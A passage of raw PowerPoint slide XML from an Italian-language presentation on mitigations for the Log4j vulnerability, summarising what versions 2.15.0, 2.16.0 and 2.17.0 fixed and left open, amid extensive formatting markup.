              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>La versione 2.15.0 di Log4j ha risolto il problema limitando JNDI ai soli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> LDAP usati per connettersi agli oggetti primitivi Java residenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>sull’host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> locale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Tuttavia tale versione ha lasciato parzialmente irrisolta la vulnerabilità perché per le implementazioni dotate di alcuni pattern era ancora possibile definire dati di input mediante un pattern JNDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> tale da provocare un attacco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Inoltre inizialmente questa versione funzionava solo con Java 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" dirty="0">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215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr sz="1700" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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6" name="Google Shape;213;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1102B114-6F5C-4199-A0EF-3E4BAF7FF6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707085" y="2028876"/>
            <a:ext cx="5069000" cy="755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400"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="3400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accen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accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marR="0" lvl="2" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marR="0" lvl="3" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marR="0" lvl="4" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marR="0" lvl="5" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marR="0" lvl="6" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marR="0" lvl="7" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marR="0" lvl="8" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;213;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03323C26-71CC-40F0-A3C8-8B6097E35D5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930675" y="128102"/>
            <a:ext cx="5619750" cy="75565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800"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accen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2pPr>
            <a:lvl3pPr marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="3400" dirty="0"/>
              <a:t>Mitigazioni </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1783425252"/>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12" name="Google Shape;214;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB08550-3231-E6B5-ECC0-E2FCAC273A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353950" y="1008066"/>
            <a:ext cx="7154862" cy="3406775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Nella versione 2.16.0 di Log4j sono stati risolti i problemi presenti nella versione precedente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>In tale versione tutti i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> sono stati disabilitati per default eliminando interamente la funzione JNDI ed evitando quindi che Log4j possa essere utilizzato per exploit remoti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Purtroppo però la versione 2.16.0 permetteva possibili attacchi ricorsivi che avrebbero potuto provocare un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il 18 dicembre 2021 è stata rilasciata la versione 2.17.0 che previene tutti i tipi di attacchi a Log4j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Tuttavia ancora oggi ci sono molti software che utilizzano una versione vulnerabile di Log4j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">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215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>18</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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6" name="Google Shape;213;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1102B114-6F5C-4199-A0EF-3E4BAF7FF6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707085" y="2028876"/>
            <a:ext cx="5069000" cy="755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400"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="3400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accen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accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marR="0" lvl="2" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marR="0" lvl="3" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marR="0" lvl="4" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marR="0" lvl="5" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marR="0" lvl="6" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marR="0" lvl="7" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marR="0" lvl="8" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Montserrat Alternates"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Alternates"/>
                <a:ea typeface="Montserrat Alternates"/>
                <a:cs typeface="Montserrat Alternates"/>
                <a:sym typeface="Montserrat Alternates"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;213;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE017A4-D935-E141-9452-99E344067238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930675" y="128102"/>
            <a:ext cx="5619750" cy="75565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800"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accen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2pPr>
            <a:lvl3pPr marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marR="0" lvl="8" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
